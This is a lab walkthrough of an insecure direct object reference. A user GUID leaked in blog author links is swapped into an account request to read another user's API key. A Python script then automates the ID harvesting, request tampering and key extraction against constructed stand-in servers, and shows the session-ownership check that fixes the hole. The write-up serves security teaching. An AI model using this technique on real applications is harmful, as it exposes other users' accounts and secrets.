User ID controlled by request parameter, with unpredictable user IDs

This is another example of horizontal privilege escalation, this time with a GUID (Globally Unique Identifier) as the user ID. A GUID cannot be guessed or enumerated, so the attack only works if the application leaks the victim's identifier somewhere else; here it does, in the blog.
After clicking "Access the lab", we see a blog. Viewing the profiles of different users shows that each user's identifier appears in the URL bar. The following steps show where it comes from.
I click on the "View post" button under the first post:

Then on the username:

Now the user's identifier is visible in the URL bar, as the userId parameter:
userId=<GUID of the post's author>
Since the application exposes the administrator's GUID this way, it should expose carlos's identifier the same way. After a few seconds of searching, I found post ID 6, which belongs to carlos:

Clicking on his name, we obtain his GUID from the address bar:
userId=640f2c14-8f0e-44f3-aa69-df3376e7c5eb
Our task is to obtain the API key of the user carlos, but we only have the credentials of the user wiener.
We log in with the credentials provided in the task:
wiener:peter
We check the requests in Burp's HTTP history and find the request that loads our own account page; it carries our GUID as a parameter.
Let's see whether changing the ID in that request gives us access to carlos's account:

Right-click on the highlighted request and select "Send to Repeater".
We replace our userId value with carlos's GUID and send the request. The server does not check that the requested ID belongs to the logged-in session: the response comes back with status 200 and contains carlos's account page:

We copy the API key from the response, click "Submit solution", paste it in and submit. Done:

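The same procedure as a script, added here as an example rather than code from the lab or the original post: harvest the GUIDs leaked by the blog's author links, then request the account page with the victim's GUID and pull the API key out of the response. The HTML snippets and the two stand-in servers are constructed for this example; the real lab's account page parameter name and markup are assumed, not copied from the page.

```python
import re
import uuid
from urllib.parse import urlparse, parse_qs

# Constructed GUIDs. carlos's is the one from the writeup; wiener's is made up.
CARLOS_ID = "640f2c14-8f0e-44f3-aa69-df3376e7c5eb"
WIENER_ID = "6b0f4b7c-2a3e-4d1f-9c8a-1f2e3d4c5b6a"

# Constructed blog post HTML: the author link leaks the user's GUID.
# The second link is malformed on purpose, to show it is filtered out.
SAMPLE_POST_HTML = """
<div class="blog-post">
  <a href="/blogs?userId=640f2c14-8f0e-44f3-aa69-df3376e7c5eb">carlos</a>
  <a href="/blogs?userId=not-a-guid">broken</a>
  <p>Post body...</p>
</div>
"""


def harvest_user_ids(html):
    """Return {username: guid} for every author link carrying a userId parameter."""
    found = {}
    for href, name in re.findall(r'href="([^"]*userId=[^"]*)"[^>]*>([^<]+)<', html):
        guid = parse_qs(urlparse(href).query).get("userId", [None])[0]
        try:
            uuid.UUID(guid)  # keep only well-formed GUIDs
        except (TypeError, ValueError):
            continue
        found[name.strip()] = guid
    return found


def my_account_request(host, session_cookie, target_id):
    """Raw HTTP request as Repeater would send it, with the ID swapped (param name assumed)."""
    return (f"GET /my-account?id={target_id} HTTP/1.1\r\n"
            f"Host: {host}\r\nCookie: session={session_cookie}\r\n\r\n")


def extract_api_key(html):
    """Pull the key out of the account page; markup is an assumption."""
    m = re.search(r'Your API Key is:\s*<span[^>]*>([^<]+)</span>', html)
    return m.group(1).strip() if m else None


def probe_idor(fetch, target_id):
    """fetch(path) -> (status, body) using OUR session. Returns the key on a 200, else None."""
    status, body = fetch(f"/my-account?id={target_id}")
    return extract_api_key(body) if status == 200 else None


# Constructed stand-in servers. Both run with a session that belongs to wiener.
ACCOUNTS = {
    WIENER_ID: ("wiener", "wiener-api-key-0000"),
    CARLOS_ID: ("carlos", "carlos-api-key-1234"),
}
SESSION_OWNER = WIENER_ID


def _account_page(user_id):
    name, key = ACCOUNTS[user_id]
    return (f"<h1>My Account</h1><p>Your username is: {name}</p>"
            f'<div>Your API Key is: <span id="api-key">{key}</span></div>')


def vulnerable_fetch(path):
    """The lab's behaviour: serves whatever id is requested, ignoring the session owner."""
    user_id = parse_qs(urlparse(path).query).get("id", [None])[0]
    if user_id not in ACCOUNTS:
        return 404, "not found"
    return 200, _account_page(user_id)


def fixed_fetch(path):
    """Hardened variant: the requested id must match the authenticated session."""
    user_id = parse_qs(urlparse(path).query).get("id", [None])[0]
    if user_id != SESSION_OWNER:
        return 403, "forbidden"
    return 200, _account_page(user_id)


if __name__ == "__main__":
    ids = harvest_user_ids(SAMPLE_POST_HTML)
    print("leaked IDs:", ids)
    print(my_account_request("lab.example", "SESSION_COOKIE", ids["carlos"]))
    print("vulnerable server:", probe_idor(vulnerable_fetch, ids["carlos"]))
    print("fixed server:", probe_idor(fixed_fetch, ids["carlos"]))
```

The point of the two servers is the check that is missing in the lab: the fixed variant ties the requested ID to the session's owner instead of trusting the parameter, and the unpredictability of the GUID is then irrelevant because the leak in the blog is no longer enough on its own.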